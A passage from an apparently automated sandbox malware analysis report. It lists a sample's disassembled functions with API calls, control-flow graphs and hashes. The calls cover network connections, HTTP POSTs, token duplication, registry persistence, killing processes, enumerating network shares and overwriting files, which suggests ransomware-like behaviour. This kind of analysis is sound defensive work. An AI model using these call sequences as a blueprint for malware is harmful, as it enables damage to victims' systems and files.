        • Part of subcall function 002086B7: SetFilePointerEx.KERNEL32(?,?,?,?,00000000), ref: 00208713
        • Part of subcall function 002086B7: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00208737
        • Part of subcall function 002086B7: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00208766
      • CloseHandle.KERNEL32(?), ref: 00208AC2
      • CloseHandle.KERNEL32(000000FF), ref: 00208ACD
      • DeleteFileW.KERNEL32(?), ref: 00208AE3
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: File$PointerWrite$AttributesBuffersCloseCreateFlushHandle$DeleteRead
      • String ID:
      • API String ID: 668398616-0
      • Opcode ID: 31cc8a125b48ecd708442ca40084ee78d6ed86aebec5d21e0b3ebc581b04a76e
      • Instruction ID: 4695a49690c77ee7d9ba542ae7ce680719674b70bef490181814456b14741075
      • Opcode Fuzzy Hash: 31cc8a125b48ecd708442ca40084ee78d6ed86aebec5d21e0b3ebc581b04a76e
      • Instruction Fuzzy Hash: 47B19C71A1030AAFDF118FA4DC49BEFBBB9BF08310F144125F944E6692EB319A64CB50
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      control_flow_graph 465 205067-2050bd htons call 20905b * 2 470 2050c3-2050c8 465->470 471 205219-20522f call 2090a1 * 2 465->471 470->471 473 2050ce-2050d0 470->473 475 2050d2-2050f6 htonl socket 473->475 476 205139-20513b 473->476 478 205131-205137 475->478 479 2050f8-20510a ioctlsocket 475->479 480 205141-20514d call 204fa9 476->480 481 20520d-205213 476->481 478->473 478->476 479->478 483 20510c-20511b connect 479->483 488 20514e-20515b 480->488 481->470 481->471 485 20512a-205130 483->485 486 20511d-205128 WSAGetLastError 483->486 485->478 486->478 486->485 489 2051e1-2051eb closesocket 488->489 490 205161-205184 getsockopt 488->490 489->488 492 2051f1 489->492 490->489 491 205186-205189 490->491 491->489 493 20518b-2051a0 recv 491->493 494 205207-20520b 492->494 495 2051a2-2051a8 WSAGetLastError 493->495 496 2051ab-2051ad 493->496 494->481 497 2051f3-205205 call 202084 494->497 495->496 498 2051b8-2051db getpeername 496->498 499 2051af-2051b6 496->499 497->471 497->494 501 2051de 498->501 499->498 499->501 501->489
      APIs
      • htons.WS2_32(000001BD), ref: 00205085
        • Part of subcall function 0020905B: GetProcessHeap.KERNEL32(00000008,00000000,002092F9,00000001,00000002,00000000,00000000,00203BCD,00000000,00000000,00000000,00000000,?,?,?,00203C8D), ref: 0020906C
        • Part of subcall function 0020905B: HeapAlloc.KERNEL32(00000000,?,00203C8D,00000017,00000000,00000000,?,?,?,002028D8,00000000,00000000,00000000), ref: 00209073
      • htonl.WS2_32(00000000), ref: 002050DB
      • socket.WS2_32(00000002,00000001,00000006), ref: 002050EC
      • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 00205102
      • connect.WS2_32(00000000,?,00000010), ref: 00205113
      • WSAGetLastError.WS2_32 ref: 0020511D
      • getsockopt.WS2_32(?,0000FFFF,00001007,?,?), ref: 0020517C
      • recv.WS2_32(?,?,00000001,00000002), ref: 00205195
      • WSAGetLastError.WS2_32 ref: 002051A2
      • getpeername.WS2_32(?,?,?), ref: 002051C9
      • closesocket.WS2_32(?), ref: 002051E3
      Strings
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: ErrorHeapLast$AllocProcessclosesocketconnectgetpeernamegetsockopthtonlhtonsioctlsocketrecvsocket
      • String ID: w"
      • API String ID: 1659685214-841204015
      • Opcode ID: efa02fcd5ca28a63541fca293f6f6beeb9959132defadbaa56fcccb912a4836f
      • Instruction ID: 67017fa87a833c3ddee76d990292f0e059ac27d8add72a88de1c5e09783a6a99
      • Opcode Fuzzy Hash: efa02fcd5ca28a63541fca293f6f6beeb9959132defadbaa56fcccb912a4836f
      • Instruction Fuzzy Hash: 25516F71D10719AFDF119FA4D889BEEFBB9EF04310F100429EA05A6192D7715AA0CF91
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      control_flow_graph 503 2049d3-204a5b call 206347 call 2090b5 call 209041 GetVersion call 208fa9 512 204a61-204a83 call 203d4b GetModuleHandleA GetProcAddress 503->512 513 204b3a-204b3d 503->513 520 204b24-204b33 call 203d4b 512->520 521 204a89-204a8c 512->521 515 204b44-204b47 513->515 516 204b3f-204b42 CloseHandle 513->516 518 204b49-204b4c CloseHandle 515->518 519 204b4e-204b51 515->519 516->515 518->519 522 204b53-204b56 CloseHandle 519->522 523 204b58-204b5b 519->523 520->513 534 204b35-204b38 CloseHandle 520->534 521->520 527 204a92-204a9d call 205b0e 521->527 522->523 524 204b62-204b65 523->524 525 204b5d-204b60 CloseHandle 523->525 528 204b70-204b84 call 2039b7 524->528 529 204b67-204b6f call 2090a1 524->529 525->524 527->520 538 204aa3-204aab GetShellWindow 527->538 529->528 534->513 538->520 539 204aad-204aba GetWindowThreadProcessId 538->539 539->520 540 204abc-204ad0 OpenProcess 539->540 540->520 541 204ad2-204ae5 OpenProcessToken 540->541 541->520 542 204ae7-204b06 DuplicateTokenEx 541->542 542->520 543 204b08-204b21 542->543 543->520
      APIs
        • Part of subcall function 00209041: GetProcessHeap.KERNEL32(00000000,?,002062B1,00000030,?,00000040,00202A6F,0020B410), ref: 0020904D
        • Part of subcall function 00209041: HeapAlloc.KERNEL32(00000000), ref: 00209054
      • GetVersion.KERNEL32(00000000,?,00000000), ref: 00204A12
      • GetModuleHandleA.KERNEL32(?,00000001), ref: 00204A71
      • GetProcAddress.KERNEL32(00000000), ref: 00204A78
      • CloseHandle.KERNEL32(?), ref: 00204B38
        • Part of subcall function 00205B0E: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00205B3B,00000000,00000000,00000000,002037EB,00000000), ref: 00205B19
      • GetShellWindow.USER32 ref: 00204AA3
      • GetWindowThreadProcessId.USER32(00000000,?), ref: 00204AB2
      • OpenProcess.KERNEL32(00000400,00000000,?), ref: 00204AC5
      • OpenProcessToken.ADVAPI32(00000000,02000000,00202B94), ref: 00204ADD
      • DuplicateTokenEx.ADVAPI32(00202B94,02000000,?,00000002,00000001,?), ref: 00204AFE
      • CloseHandle.KERNEL32(?), ref: 00204B42
      • CloseHandle.KERNEL32(?), ref: 00204B4C
      • CloseHandle.KERNEL32(00202B94), ref: 00204B56
      • CloseHandle.KERNEL32(?), ref: 00204B60
        • Part of subcall function 00203D4B: GetModuleHandleA.KERNEL32(00000000,?,00000000,00000000,002048E0,?), ref: 00203D8C
        • Part of subcall function 00203D4B: GetProcAddress.KERNEL32(00000000,00000001), ref: 00203DA1
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Handle$Close$Process$Module$AddressHeapOpenProcTokenWindow$AllocDuplicateFileNameShellThreadVersion
      • String ID:
      • API String ID: 4248481622-0
      • Opcode ID: d11a1e1faef43349bd61b46a5a67d0f5c8f257aca2b836baef850ea62dbe53ba
      • Instruction ID: e369c0f04ab48dfc12add288827bea64c55a711ac543c8cdaef410114c75a5c0
      • Opcode Fuzzy Hash: d11a1e1faef43349bd61b46a5a67d0f5c8f257aca2b836baef850ea62dbe53ba
      • Instruction Fuzzy Hash: AD513AB1C11319AFDB11AFA0DD49AEEBBB9FF08715F104066F604A2092D7319A55CFA1
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      control_flow_graph 545 204428-20445e GetCurrentProcess OpenProcessToken 546 204464-204496 GetTokenInformation call 209041 GetTokenInformation 545->546 547 20452b-20452e 545->547 555 20452a 546->555 556 20449c-2044bb AllocateAndInitializeSid 546->556 548 204530-204533 FreeSid 547->548 549 204539-20453b 547->549 548->549 551 204544-20454a 549->551 552 20453d-204543 call 2090a1 549->552 552->551 555->547 556->555 558 2044bd-2044c1 556->558 558->555 559 2044c3-2044c6 558->559 560 2044c9-2044d9 EqualSid 559->560 561 2044e6-204514 LookupAccountSidW 560->561 562 2044db-2044e2 560->562 564 204523 561->564 565 204516-204521 GetLastError 561->565 562->560 563 2044e4 562->563 563->555 564->555 565->555 565->564
      APIs
      • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000000), ref: 0020444F
      • OpenProcessToken.ADVAPI32(00000000), ref: 00204456
      • GetTokenInformation.ADVAPI32(?,00000002,00000000,}I ,}I ,00000000), ref: 00204478
        • Part of subcall function 00209041: GetProcessHeap.KERNEL32(00000000,?,002062B1,00000030,?,00000040,00202A6F,0020B410), ref: 0020904D
        • Part of subcall function 00209041: HeapAlloc.KERNEL32(00000000), ref: 00209054
      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00204492
      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 002044B3
      • EqualSid.ADVAPI32(?,?), ref: 002044D1
      • LookupAccountSidW.ADVAPI32(00000000,?,?,?,?,?,?), ref: 0020450C
      • GetLastError.KERNEL32 ref: 00204516
      • FreeSid.ADVAPI32(?), ref: 00204533
      Strings
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: ProcessToken$HeapInformation$AccountAllocAllocateCurrentEqualErrorFreeInitializeLastLookupOpen
      • String ID: }I
      • API String ID: 1407196647-3116234389
      • Opcode ID: 5c18452cbca282b78a7dd3b5bbaa5d1919967d927948a58e50fceb72b065ff07
      • Instruction ID: c5537eec473ded9223d2c1015bf15409395e9031503b2821fb1a9aebcc44d690
      • Opcode Fuzzy Hash: 5c18452cbca282b78a7dd3b5bbaa5d1919967d927948a58e50fceb72b065ff07
      • Instruction Fuzzy Hash: EB311BB2900309ABDB11EF94DD89EEEBBBDEB14345F90806AE601E2091D7309E559B61
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      APIs
      • WinHttpOpen.WINHTTP(0020A3C0,00000001,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00203CD3
      • WinHttpConnect.WINHTTP(00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00203CE7
      • WinHttpOpenRequest.WINHTTP(00000000,POST,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000,00000000), ref: 00203D08
      • WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,?,?,?,00000000,?,?,?,00000000,00000000,00000000), ref: 00203D21
      • WinHttpReceiveResponse.WINHTTP(00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00203D2D
      • WinHttpCloseHandle.WINHTTP(00000000,?,?,?,00000000,00000000,00000000), ref: 00203D37
      • WinHttpCloseHandle.WINHTTP(?,?,?,?,00000000,00000000,00000000), ref: 00203D3C
      • WinHttpCloseHandle.WINHTTP(?,?,?,?,00000000,00000000,00000000), ref: 00203D42
      Strings
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Http$CloseHandle$OpenRequest$ConnectReceiveResponseSend
      • String ID: POST$t.
      • API String ID: 4150888541-2299521900
      • Opcode ID: 3960dee8d845ce7e81ea8f791e8ccb7b64395e39989c6de3673d30f5da5125e4
      • Instruction ID: 71397d9836d0918606f1a01d30269aa62721b8d7a090574670606093225d20b6
      • Opcode Fuzzy Hash: 3960dee8d845ce7e81ea8f791e8ccb7b64395e39989c6de3673d30f5da5125e4
      • Instruction Fuzzy Hash: 75111235902328BBCB215F62AC8CCDFBF7DEF4A7A0B404454F40992151D6348950DBE1
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
        • Part of subcall function 00203C7A: GetVolumeInformationW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,002028D8,00000000,00000000), ref: 00203CA2
        • Part of subcall function 00203A18: RegOpenKeyExW.ADVAPI32(00000002,00000000,00000000,00020119,00000000,00000000,00000000,80000002,00000000,00000002,?), ref: 00203A44
        • Part of subcall function 00203A18: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?), ref: 00203A60
        • Part of subcall function 00203A18: RegCloseKey.ADVAPI32(?), ref: 00203A79
      • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,80000002,00000000,00000002,?), ref: 0020463C
      • GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,80000002,00000000,00000002,?), ref: 0020464E
      • GetProcAddress.KERNEL32(00000000), ref: 00204655
      • GetCurrentProcess.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,?,?,?,?,80000002,00000000), ref: 002046E1
      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,?,?,?,?,00000000), ref: 00204737
      • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,00000000), ref: 0020475F
      • WriteFile.KERNEL32(?,?,00000208,?,00000000,?,?,?,?,00000000), ref: 0020478B
      • FlushFileBuffers.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,?,?,?,?,80000002,00000000), ref: 002047A3
      • CloseHandle.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,?,?,?,?,80000002,00000000), ref: 002047AD
        • Part of subcall function 00203EE1: GetModuleHandleA.KERNEL32(00000000,00000001,74DF35B0,00000208,00000000), ref: 00203F86
        • Part of subcall function 00203EE1: GetProcAddress.KERNEL32(00000000), ref: 00203F8F
        • Part of subcall function 00203EE1: GetModuleHandleA.KERNEL32(00000000,?), ref: 00203F98
        • Part of subcall function 00203EE1: GetProcAddress.KERNEL32(00000000), ref: 00203F9B
        • Part of subcall function 00203EE1: GetModuleHandleA.KERNEL32(00000000,?), ref: 00203FA4
        • Part of subcall function 00203EE1: GetProcAddress.KERNEL32(00000000), ref: 00203FA7
        • Part of subcall function 00203EE1: GetModuleHandleA.KERNEL32(00000000,?), ref: 00203FB0
        • Part of subcall function 00203EE1: GetProcAddress.KERNEL32(00000000), ref: 00203FB3
        • Part of subcall function 00203EE1: GetCurrentProcessId.KERNEL32 ref: 00203FE6
        • Part of subcall function 00203EE1: OpenProcess.KERNEL32(00000438,00000000,00000000), ref: 00203FF3
        • Part of subcall function 00204325: CoInitializeEx.OLE32(00000000,00000006,?,74DF35B0,00000208,00000000,002047D7,?,00000000,?), ref: 0020437F
        • Part of subcall function 00204325: CoUninitialize.OLE32(?,?,?,?,?,?,74DF35B0,00000208,00000000,002047D7), ref: 002043B5
        • Part of subcall function 00203E9E: ShellExecuteExW.SHELL32(?), ref: 00203ED9
      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,00000000), ref: 002047FA
      • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00204824
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Handle$AddressFileModuleProc$Process$CloseCurrentOpenWrite$BuffersCreateDeleteExecuteFlushInformationInitializeObjectQueryShellSingleUninitializeValueVersionVolumeWait
      • String ID:
      • API String ID: 3832649910-0
      • Opcode ID: 26992a29be7bfc22f9a9fce28d9c0d4be0374996cc02f513ee2b405e9018150b
      • Instruction ID: eccd28b43fd4754335d19b1f0ec88002e128ec3ddceb6d9c6813f3882e53e4be
      • Opcode Fuzzy Hash: 26992a29be7bfc22f9a9fce28d9c0d4be0374996cc02f513ee2b405e9018150b
      • Instruction Fuzzy Hash: D59191B2418345AFD710AFA0DD46E5FBBE8EF88710F40492DF685921A2E771DA248F52
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
        • Part of subcall function 00209041: GetProcessHeap.KERNEL32(00000000,?,002062B1,00000030,?,00000040,00202A6F,0020B410), ref: 0020904D
        • Part of subcall function 00209041: HeapAlloc.KERNEL32(00000000), ref: 00209054
        • Part of subcall function 00205B0E: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00205B3B,00000000,00000000,00000000,002037EB,00000000), ref: 00205B19
      • CopyFileW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0020137E
      • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020106,?), ref: 002013A9
      • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00020106,?), ref: 002013EF
      • CopyFileW.KERNEL32(?,00000000,00000001), ref: 00201444
      • GetFileAttributesW.KERNEL32(00000000), ref: 0020144B
      • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 0020145B
      • CopyFileW.KERNEL32(?,00000000,00000001), ref: 002014A8
      • CopyFileW.KERNEL32(?,00000000,00000001), ref: 002014CB
      • GetFileAttributesW.KERNEL32(00000000), ref: 002014D2
      • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 002014E2
        • Part of subcall function 00203A93: RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00201408,?,00000104,?,00201408,00000000,00000000), ref: 00203AA6
        • Part of subcall function 00203A93: RegCloseKey.ADVAPI32(?,?,00201408,00000000,00000000), ref: 00203AB2
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: File$AttributesCopy$HeapOpen$AllocCloseModuleNameProcessValue
      • String ID:
      • API String ID: 255945531-0
      • Opcode ID: 36df20e74d36d036121982ea035b7180216ae9add41ecc55332adec97191d0df
      • Instruction ID: 7a58b292234b0ae8cd6a1ae2cf47f838bc90512a671d022e39b12a27441f4b90
      • Opcode Fuzzy Hash: 36df20e74d36d036121982ea035b7180216ae9add41ecc55332adec97191d0df
      • Instruction Fuzzy Hash: 66914271D20319AADF11ABA4DC46BAE7BB9EF44311F200016F505B50E3DB75AEB09F60
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • InitializeCriticalSectionAndSpinCount.KERNEL32(0020D6A0,00000FA0,00000000,00000000,?,002078B7,00000000,00000000,00000000,?,002017C2,?), ref: 002077F2
      • EnterCriticalSection.KERNEL32(0020D6A0,?,002078B7,00000000,00000000,00000000,?,002017C2,?), ref: 002077F9
      • QueryPerformanceCounter.KERNEL32(002017C2,?,002078B7,00000000,00000000,00000000,?,002017C2,?), ref: 00207809
      • GetTickCount.KERNEL32 ref: 0020780B
      • GetCurrentProcessId.KERNEL32(?,002078B7,00000000,00000000,00000000,?,002017C2,?), ref: 00207829
      • GetCurrentThreadId.KERNEL32 ref: 00207835
      • GetLocalTime.KERNEL32(?,?,002078B7,00000000,00000000,00000000,?,002017C2,?), ref: 00207845
      • SystemTimeToFileTime.KERNEL32(?,00000000,?,002078B7,00000000,00000000,00000000,?,002017C2,?), ref: 00207853
      • QueryPerformanceCounter.KERNEL32(002017C2,?,002078B7,00000000,00000000,00000000,?,002017C2,?), ref: 0020786F
      • LeaveCriticalSection.KERNEL32(0020D6A0,?,002078B7,00000000,00000000,00000000,?,002017C2,?), ref: 00207899
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CriticalSectionTime$CountCounterCurrentPerformanceQuery$EnterFileInitializeLeaveLocalProcessSpinSystemThreadTick
      • String ID:
      • API String ID: 1260023459-0
      • Opcode ID: 01024afbeb089eb243a2eae0c922dc9038e45ab7e5c78545d74c955ac02a3e5e
      • Instruction ID: 47668362d394f9901b3c0490139bc0bf7c7e7b981410804801d1ab49e17719ed
      • Opcode Fuzzy Hash: 01024afbeb089eb243a2eae0c922dc9038e45ab7e5c78545d74c955ac02a3e5e
      • Instruction Fuzzy Hash: A611A4719023189BCB04DBF8FD4DA8EBBFDEB48315B820566E10AD6122D735A5489F52
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00204E00
      • Process32FirstW.KERNEL32(Q# ,?), ref: 00204E38
      • OpenProcess.KERNEL32(00000001,00000000,?,00000000,?,?,?), ref: 00204E68
      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?), ref: 00204E76
      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00204E7F
      • Process32NextW.KERNEL32(?,?), ref: 00204E8E
      • CloseHandle.KERNEL32(?,?,?,?), ref: 00204E9C
      Strings
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
      • String ID: Q#
      • API String ID: 2696918072-402180668
      • Opcode ID: 9849923e2135bfc18ccd2e0c90ea1b67f257327ed91dbe00c001c2a4f66ad1f2
      • Instruction ID: 4ddb9c6cc64d3252a18595d738385a8e52f1f9fbbcf9bb19569adb63ab93c526
      • Opcode Fuzzy Hash: 9849923e2135bfc18ccd2e0c90ea1b67f257327ed91dbe00c001c2a4f66ad1f2
      • Instruction Fuzzy Hash: C91181B1D01319AFDB10AFA4EC8CA9FBBBCEF48300F0040A5E904E2152D7749E558E90
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
        • Part of subcall function 00209041: GetProcessHeap.KERNEL32(00000000,?,002062B1,00000030,?,00000040,00202A6F,0020B410), ref: 0020904D
        • Part of subcall function 00209041: HeapAlloc.KERNEL32(00000000), ref: 00209054
      • WNetOpenEnumW.MPR(00000000,00000000,00000000,00000000,?), ref: 00201E66
      • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00201E83
        • Part of subcall function 00205962: EnterCriticalSection.KERNEL32(?,00000000,00000000,00202E54), ref: 0020596A
        • Part of subcall function 00205962: LeaveCriticalSection.KERNEL32(?), ref: 00205973
      • WNetEnumResourceW.MPR(?,?,?,?), ref: 00202046
      • WNetCloseEnum.MPR(?), ref: 0020205E
      Strings
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmp
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Enum$CriticalHeapResourceSection$AllocCloseEnterLeaveOpenProcess
      • String ID: \\?\UNC\\\e-
      • API String ID: 3929263231-4184602625
      • Opcode ID: 5fb0cf932c63a267e038596dfd797f28888537f7a7aa3d6cdf0f4f515cd0ed86
      • Instruction ID: 62ef254263ac4f966ebbd694bd20fba414773b877f208583ae4f47b367881ac2
      • Opcode Fuzzy Hash: 5fb0cf932c63a267e038596dfd797f28888537f7a7aa3d6cdf0f4f515cd0ed86
      • Instruction Fuzzy Hash: C261AD72114302EFDB21AF24DC49A2BBBAAAF94310F140819F855D61E3E731D9B9CB52
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • MoveFileW.KERNEL32(?,?), ref: 00208CD3
      • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 00208CF1
      • SetFilePointerEx.KERNEL32(00000001,?,?,?,00000002), ref: 00208E3F
      • WriteFile.KERNEL32(00000001,?,?,?,00000000), ref: 00208E59
      • SetEndOfFile.KERNEL32(00000001), ref: 00208E6F
        • Part of subcall function 00208AF1: SetFilePointerEx.KERNEL32(?,00000000,?,?,00000000), ref: 00208B28
        • Part of subcall function 00208AF1: WriteFile.KERNEL32(?,?,00040000,?,00000000), ref: 00208B3F
      • FlushFileBuffers.KERNEL32(00000001), ref: 00208E8E
      • CloseHandle.KERNEL32(?), ref: 00208E9E
      • MoveFileW.KERNEL32(?,?), ref: 00208EB0
      Memory Dump Source
